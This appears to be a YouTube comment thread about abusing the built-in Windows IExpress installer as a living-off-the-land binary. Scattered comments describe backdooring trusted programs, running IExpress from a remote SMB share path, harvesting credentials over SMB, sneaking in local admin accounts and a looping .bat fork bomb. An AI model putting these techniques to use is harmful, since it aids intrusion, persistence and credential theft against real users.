Reminds me of doing naughty things with winrar back in the day. You could create a winrar executable that would function like a normal zip file but at the end of extraction you could specify an executable to run. So you could essentially give the downloader what they were looking for but sneak in a little surprise with it.
I use to use IExpress back on Windows XP because I didn't know how to write a binder. Wait until you find out WPF applications on web pages to bypass security. Not as easy as it use to be with IE but still there. Also use a MSI file with resilience to re-download when the file is removed. Old as time, but works even today.
"open and run this EXE on your computer, I promise it's not malware!" Hahaha John, one of your last videos showcased people watching UA-cam tutorials and getting compromised by following those instructions! Kidding aside, I love the content, keep up the good work!
@@nyandesu9165lol not really no i had an imac as a kid not a windows. ive just never read about this particular binary. ill usually look at windir for dll sideloading and stuff by checking missing dll’s in procmon or wtv. havent explored a lot of lolbins. :D
When you were running the .exe files, I assumed you were in Admin role, I am curious what would display on the UAC for a none Admin role? Would it have Microsoft on there? I noticed you showed it was unverified, but if it still says Microsoft, I am sure that is enough to fool most people? Also, I was not sure were the connection to Internet Explorer came from in the Sigcheck details?
Finally the 40+min. Videos are back. I missed them. I would love more stuff like the 'Throwback Network' Videos. And no offence, but the 10-15min. Videos with 3min. Advertisements in the middle got kinda boring over the time. Lov ya, take care.❤
Okay serious question. I can't test it on my own machine, because it refused to build a cabinet, threw an error. If this was generated on a different PC and downloaded from the internet, it would still have the mark of the web though, right? And windows would at least try to prevent me from running it? Or is the point to generate the file on the infected machine itself? But then why use the malware program to create an executable that runs something, if it's already running malware? I'm not very familiar with LOLBAS or the like, but I'm curious. What exactly is the attack angle that Iexpress provides? (also silly me writing a comment mid-video, might get answered later)
Is it just obfuscation for deeper layers of malware? Or does it allow you to run programs in admin mode? That AdminQuiet mode seemed interesting, can that be used to level up your permissions?
this thing basically just zip your files and ship it as an exe. literally any antivirus would detect it and see right through it, and only skids would use it.
Is the error you are getting referring to being unable to open the Report file? If that's the case, try running iexpress.exe from the same working directory that you are writing the EXE or CAB file to -- I've seen it be finicky with that. You are right that any file downloaded would still have Mark of the Web (unless you wrapped it inside of a container file like an ISO or others, like discussed in the previous MOTW video). As you mentioned, you certainly could generate the file on the same target machine you already have initial access on, and that can still be a valuable angle to either setup other persistence mechanisms, or craft one of those social engineering ploys like a "backdoored" regular and normal application, to trick an end user into willingly running a program as an elevated user, or entering credentials that otherwise weren't on the machine. Think of a tampered program sitting on the desktop that the user usually runs, or something pinned on their taskbar or in their start menu that anyone would just intentionally click on And you are right that it can be extra obfuscation for deeper layers of malware of malware just as well, it can just as easily be used for the next stage of an attack chain, again to obscure code execution. In regards to iexpress being "just an installer to run what you specify, as any installer would", keep in mind that CompressionType QUANTUM doesn't even need to have it invoke as an installer since you are simply running the command regularly and not it's generated EXE... and there is nothing stopping you from providing the file with a remote location by a SMB network share or UNC path (iexpress.exe /n /q \\192.168.111.179\share emote.SED), so it doesn't need to be on disk or depend on another file artifact.
Why? Because you are only vulnerable to Linux viruses? You aren't safe just because you use Linux. Running things willy nilly is bad no matter the OS. The strongest anti virus is a smart user, but even they aren't infallible.
Yo mate, one of my machines just got hacked. Other than Twitter, how can I send you the logs and artifacts? It might be worth looking into, since you're into that stuff.
this fixes a problem which is not there, you understand? there are 1000s ways of bundling your software, but like some other comments said: the avs can see right thru it (which is logic because its not obfuscated...
Seems to me the run command could be a nice SMB command to a machine you've got a listener on to grab creds and you're off to the races if you get the right person :) BTW John have you seen some of the cute "shortcut" files people are trying to distribute of late that are malicious? Shady!
Probably not, as it’s built in on Windows. But if you use it to execute some generic and known malicious payload like from Metasploit, it will most likely block that.
Gosh this is like that WinRAR or WinZip self-executative zip or rar files. Where it auto-extracts and runs the applications you want to run (either making your own version of an installation of a software or this) Or those stuff like NSIS or InstallShield stuff I also used abit
i mean you cam use whatever you want for cnc lol, id rather use something that wont get flagged in memory or wtv like a dotnet agent, then use a beacon or meterpreter for advanced control after i have persistence
iexpress as a trojan is like the old comics. where the CIA use old soviet gear to perform surveillance. The old soviet gear being giant satellite dishes with giant head phones and antenna.
Not really living off the land when I have to then social engineer someone to install the file or run it from within a service ive already exploited, better ways to get this done, nice way to make an installer though i guess...
@@not_user11 I use windows stuff like this all the time. Pretty much anything old, or CLI will run with WINE. Hell, I’d say a good 80% of Windows software, even a lot of newer stuff, runs pretty well with WINE. This will run flawlessly.
Meow! Now, Everyone Is A Suspect! This Is The Back Door We All Suspected To Exist On A Global Scale, But Backwards! Now, If Each Binary Is A Lock, Then We Have Multiple Locks To Complete A Series. Then Technically Each Series Has A "Master" Key. So We Will Have Different Series Relating To Different Topics, Giving Us A Set Of "Grand Master" Keys. A Set Could Be 10 Master Keys, Which Would Be Considered Too Many! Why Do I SENSE, Somewhere In There, A "GRAND-GRAND MASTER" Key!? In All Things Considered, Human Nature Is Full Of Self Gratification Shortcuts Not To Repeat Insanity! Awesome Report On This One, John! YOU Gave Me Another Next TEN YEARS Of To-Do Fulfillment Duties, Then Be Outdated! LOL!
Hey can someone give me a idea of what i should price my mobile app as?? Main purpose/function is to be able to hash files and verify files on mobile already made it and works well just dont know what to price it at was thinking £2? Dont want to open source it got bills to pay, any advice or idea's are welcome
@@seancrouch why can’t I do that on my PC? My phone is basically for calling and texting people and sometimes watching UA-cam/surfing the web. If I were going to use my phone like a computer, I’d just install a Linux distro on it and have everything I could ever want for free.
Why would it be used specifically by script kids? People like you seems to think real hackers are only using their own zero-days written in assembly and they're connecting to the internet by using a hacked norwegian satellites etc... lol
This is kind of stupid. Any installer maker can do this, and there are many easier to use and abuse. It is not in the lust because AN INSTALLER MAKER is known to be able to do this, it is not a design flaw or weakness.
This isn't stupid. It comes pre-installed even in the latest version of windows. It can be used for living off the land. Any installer won't be present by default in a windows device that you gained access to but this one is native to windows.
@@anik2443 it does not matter that comes with windows. Why would it? Is not like YOU are making your own malware to infect yourself. Any bad actor can use whatever dont have to be pre-installed. That is why it is stupud
@@VaracolacidVesci do you know nothing about post exploitation? It's for remaining undetected by using tools available natively in the system. Go Research about it
@@anik2443 hahahaha ofc not! You are trying to sound fancy but clearly you are just another asshole in the internet. it's not like the av engines or any other software would say OH it is made by the system tool, let's allow it!. hahaha how stupid can you be
@@anik2443 hahahaha OFC NOT! There is nothing special about it being on the system, is not like the exe would have anything special about it. is not like the AV engines or any other protection would say, OH it is made by the system tool let's allow it regardless, hahahaha HOW STUPID CAN YOU BE?
i remember pranking my friends with a .bat file (named hello.bat) containing: start hello.bat call hello.bat very funny, unless you have unsaved work (unfortunately it won't work if you don't have access to "start" like on school computers, but you can still call other programs using "call", it's just not exponential)
Reminds me of doing naughty things with winrar back in the day. You could create a winrar executable that would function like a normal zip file but at the end of extraction you could specify an executable to run. So you could essentially give the downloader what they were looking for but sneak in a little surprise with it.
Still being used till today
I use to use IExpress back on Windows XP because I didn't know how to write a binder. Wait until you find out WPF applications on web pages to bypass security. Not as easy as it use to be with IE but still there. Also use a MSI file with resilience to re-download when the file is removed. Old as time, but works even today.
With this I think I'm not just "living off the land", your computer is my Dukedom
"open and run this EXE on your computer, I promise it's not malware!" Hahaha John, one of your last videos showcased people watching UA-cam tutorials and getting compromised by following those instructions! Kidding aside, I love the content, keep up the good work!
literally never heard of it, great video.
wow, you must have had a sad childhood if you never went to play in system32
@@nyandesu9165lol not really no i had an imac as a kid not a windows. ive just never read about this particular binary. ill usually look at windir for dll sideloading and stuff by checking missing dll’s in procmon or wtv. havent explored a lot of lolbins. :D
How do people even find this stuff! At a addicted learner at this genre of IT, this is gold!
When you were running the .exe files, I assumed you were in Admin role, I am curious what would display on the UAC for a none Admin role?
Would it have Microsoft on there? I noticed you showed it was unverified, but if it still says Microsoft, I am sure that is enough to fool most people?
Also, I was not sure were the connection to Internet Explorer came from in the Sigcheck details?
Finally the 40+min. Videos are back. I missed them. I would love more stuff like the 'Throwback Network' Videos. And no offence, but the 10-15min. Videos with 3min. Advertisements in the middle got kinda boring over the time. Lov ya, take care.❤
What an outro 😂 with the loop of calc
This is golden info😊
Okay serious question. I can't test it on my own machine, because it refused to build a cabinet, threw an error. If this was generated on a different PC and downloaded from the internet, it would still have the mark of the web though, right? And windows would at least try to prevent me from running it? Or is the point to generate the file on the infected machine itself? But then why use the malware program to create an executable that runs something, if it's already running malware? I'm not very familiar with LOLBAS or the like, but I'm curious. What exactly is the attack angle that Iexpress provides? (also silly me writing a comment mid-video, might get answered later)
Is it just obfuscation for deeper layers of malware? Or does it allow you to run programs in admin mode? That AdminQuiet mode seemed interesting, can that be used to level up your permissions?
this thing basically just zip your files and ship it as an exe. literally any antivirus would detect it and see right through it, and only skids would use it.
Is the error you are getting referring to being unable to open the Report file? If that's the case, try running iexpress.exe from the same working directory that you are writing the EXE or CAB file to -- I've seen it be finicky with that. You are right that any file downloaded would still have Mark of the Web (unless you wrapped it inside of a container file like an ISO or others, like discussed in the previous MOTW video). As you mentioned, you certainly could generate the file on the same target machine you already have initial access on, and that can still be a valuable angle to either setup other persistence mechanisms, or craft one of those social engineering ploys like a "backdoored" regular and normal application, to trick an end user into willingly running a program as an elevated user, or entering credentials that otherwise weren't on the machine. Think of a tampered program sitting on the desktop that the user usually runs, or something pinned on their taskbar or in their start menu that anyone would just intentionally click on And you are right that it can be extra obfuscation for deeper layers of malware of malware just as well, it can just as easily be used for the next stage of an attack chain, again to obscure code execution. In regards to iexpress being "just an installer to run what you specify, as any installer would", keep in mind that CompressionType QUANTUM doesn't even need to have it invoke as an installer since you are simply running the command regularly and not it's generated EXE... and there is nothing stopping you from providing the file with a remote location by a SMB network share or UNC path (iexpress.exe /n /q \\192.168.111.179\share
emote.SED), so it doesn't need to be on disk or depend on another file artifact.
@@_JohnHammond Just tried it from the same folder, yeah that works. Thanks for the explanation, yeah that all makes sense. Fascinating
You have my attention for rest of my life
I ❤ living in QUANTUM time, thanks to Microsoft (and John & the researchers)
Rebuilding Installer.exe from Installer.SED - Can the other way around be done too?
Just curious
This is some very good information, mister
Is this a way to make an auto executing USB ?
This is mental, I will never trust an exe ever again 🤣 Thank goodness I use Linux as a daily OS
Why? Because you are only vulnerable to Linux viruses? You aren't safe just because you use Linux. Running things willy nilly is bad no matter the OS. The strongest anti virus is a smart user, but even they aren't infallible.
linux isn't immune to viruses also you dont need to mention that you use linux everywhere
Yo mate, one of my machines just got hacked.
Other than Twitter, how can I send you the logs and artifacts?
It might be worth looking into, since you're into that stuff.
Nevermind. This video has what your site doesn't: the full list of links 😂
can it bypass AV by putting first Exclusion to C:\ drive then executing powershell base64 memory Ransomware
no
Give up kid
This made me laugh out loud, Ty kid
it doesn't really work like that 😅
this fixes a problem which is not there, you understand? there are 1000s ways of bundling your software, but like some other comments said: the avs can see right thru it (which is logic because its not obfuscated...
Love the early morning uploads! At least in California
I wonder if u can prompt a user to run on admin privilege
you can, just like you can with any exe
@@yukiqt yeah but the installer doesnt specifically ask for admin privilege
@@k4m1kazep1lot4 if you're asking if it can bypass uac, it can't
you can put the command in the gui too, its not stopping you (13:05)
After I saw you can automate it, without any windows: definitely should be on the list !
Seems to me the run command could be a nice SMB command to a machine you've got a listener on to grab creds and you're off to the races if you get the right person :)
BTW John have you seen some of the cute "shortcut" files people are trying to distribute of late that are malicious? Shady!
wtf John, stop please, you makin' me really anxious of everything connected to internet. :D
maybe run net user add commands on secondary options ? hefty way to have sneaked in local admin accounts ?
Would antivirus catch the iexpress instance though? Like when you first call iexpress, would antivirus throw a warning?
Probably not, as it’s built in on Windows. But if you use it to execute some generic and known malicious payload like from Metasploit, it will most likely block that.
I wonder how to block that as part of Windows PC hardening🤔🤔🤔???
Gosh this is like that WinRAR or WinZip self-executative zip or rar files. Where it auto-extracts and runs the applications you want to run (either making your own version of an installation of a software or this)
Or those stuff like NSIS or InstallShield stuff I also used abit
0:13 that's what they want you to think
very good information
I would like to see this with metasploit in action but yt will not allow it right
youtube would allow it, it just wouldn't be very interesting
i mean you cam use whatever you want for cnc lol, id rather use something that wont get flagged in memory or wtv like a dotnet agent, then use a beacon or meterpreter for advanced control after i have persistence
Sir, Would you make videos about scammers please 🙏
@@romanemul1 Am I requested you? or you are a scammer?
hang on, you sta5rted a bomb on your actual computer instead of a virtual machine?
your living on the edge here!
28:05 Tags, also known as "greater than less than symbol waka waka alligator faces" 🐊🐊
it seems like a great tool to keep in the windows install... if you are the NSA 😲
Bro help bro i have doubt im kiddo
iexpress as a trojan is like the old comics. where the CIA use old soviet gear to perform surveillance. The old soviet gear being giant satellite dishes with giant head phones and antenna.
Not really living off the land when I have to then social engineer someone to install the file or run it from within a service ive already exploited, better ways to get this done, nice way to make an installer though i guess...
hm,that might be a problem
I can't try it out because my pc doesn't run windows
poor little linux user
Runs in WINE on linux.
@@_Yassir_ in the words of OTW, “if you don’t know Linux, you’re not a hacker.”
@@not_user11 I use windows stuff like this all the time. Pretty much anything old, or CLI will run with WINE. Hell, I’d say a good 80% of Windows software, even a lot of newer stuff, runs pretty well with WINE. This will run flawlessly.
Cheers.
Definitely. After watching the video, certainly! :D
honestly this only feels useful for a script kiddy kind of thing because all of this is already trivial for actual developers, e.g. via costura
Damn it John. Stop burning my unknown lolbins!
Meow! Now, Everyone Is A Suspect! This Is The Back Door We All Suspected To Exist On A Global Scale, But Backwards! Now, If Each Binary Is A Lock, Then We Have Multiple Locks To Complete A Series. Then Technically Each Series Has A "Master" Key. So We Will Have Different Series Relating To Different Topics, Giving Us A Set Of "Grand Master" Keys. A Set Could Be 10 Master Keys, Which Would Be Considered Too Many! Why Do I SENSE, Somewhere In There, A "GRAND-GRAND MASTER" Key!? In All Things Considered, Human Nature Is Full Of Self Gratification Shortcuts Not To Repeat Insanity! Awesome Report On This One, John! YOU Gave Me Another Next TEN YEARS Of To-Do Fulfillment Duties, Then Be Outdated! LOL!
Go easy on the shift key bud. 😂
The duke of windows nuking
100 percent of kids would do this on every pc in schools back in my day looooool if only we had youtube haha
You can right click on an exe and choose extract.
From below 3 which one is efficient
AWUS036ACM
AWUS036ACH
AWUS036NHA
According to you?
Using this "SED" technique. lol
The wikipedia page on this is interesting. But I am trying to figure out - why does it exist? But yes, it belongs in the lolbin category.
Sup
oh jeez, ofc thats a lolbin
Windows defender instantly detected my test file lol
Hey can someone give me a idea of what i should price my mobile app as?? Main purpose/function is to be able to hash files and verify files on mobile already made it and works well just dont know what to price it at was thinking £2? Dont want to open source it got bills to pay, any advice or idea's are welcome
@@seancrouch why can’t I do that on my PC? My phone is basically for calling and texting people and sometimes watching UA-cam/surfing the web. If I were going to use my phone like a computer, I’d just install a Linux distro on it and have everything I could ever want for free.
Hi
Bypass antivirus whith iexplorer encode payload en opera example
Iexpress something the RAT kiddies used to love using to pack up the nasty RAT's. Not seen this in time surprised its not in the LOTL files.
yikes
Bro who you yelling at tho
He's just passionate about the subject. He doesn't yell half as much as some youtubers do.
@@Cyba_IT I'm just trying to stay chill and learn about IT not have lunch with Samuel L Jackson 😆😆😆
@@looweegee252 😂😂😂
for "hackers", specifically the skids lmao
Well said 😂
well, lolbins not really only being used by skiddies, several bigger threats have been using lolbins like certutil or installutils.
@@88tx well guess any good pen tester would use anything at their disposal even if its easy no reason to work twice the amount with the same outcome🙂
I have seen sth like that with .bat
Why would it be used specifically by script kids?
People like you seems to think real hackers are only using their own zero-days written in assembly and they're connecting to the internet by using a hacked norwegian satellites etc... lol
41 minutes of yapping just to tell us that an installer can run whatever you tell it to.
You may be right about that but remember, you aren't entitled to anything and he doesn't own us anything.
domt be a dick bud
he literally jumped right in explained what the tool was
@@MygenteTV🤓
@HyBlock spoken like someone who doesn't understand how lolbin attacks work
basically first
first
First 🥇
second
don't worry soon microsoft will get rid all old ~[control-panel] and other vintage [features] and stuff in windows, so u don't mess around :D
Update: they are not getting rid of it
Yup just like those .pif files too.
bro
lol classic
twf no secret end-of-video keyword 😞
Bb
omg
First 😂
This is kind of stupid.
Any installer maker can do this, and there are many easier to use and abuse. It is not in the lust because AN INSTALLER MAKER is known to be able to do this, it is not a design flaw or weakness.
This isn't stupid. It comes pre-installed even in the latest version of windows. It can be used for living off the land. Any installer won't be present by default in a windows device that you gained access to but this one is native to windows.
@@anik2443 it does not matter that comes with windows. Why would it?
Is not like YOU are making your own malware to infect yourself.
Any bad actor can use whatever dont have to be pre-installed. That is why it is stupud
@@VaracolacidVesci do you know nothing about post exploitation? It's for remaining undetected by using tools available natively in the system. Go Research about it
@@anik2443 hahahaha ofc not! You are trying to sound fancy but clearly you are just another asshole in the internet.
it's not like the av engines or any other software would say OH it is made by the system tool, let's allow it!.
hahaha how stupid can you be
@@anik2443 hahahaha OFC NOT!
There is nothing special about it being on the system, is not like the exe would have anything special about it. is not like the AV engines or any other protection would say, OH it is made by the system tool let's allow it regardless, hahahaha HOW STUPID CAN YOU BE?
Bring game hacking *🎉❤
i remember pranking my friends with a .bat file (named hello.bat) containing:
start hello.bat
call hello.bat
very funny, unless you have unsaved work
(unfortunately it won't work if you don't have access to "start" like on school computers, but you can still call other programs using "call", it's just not exponential)
Instructions unclear. Typing does nothing on my Windows 95 computer's start menu.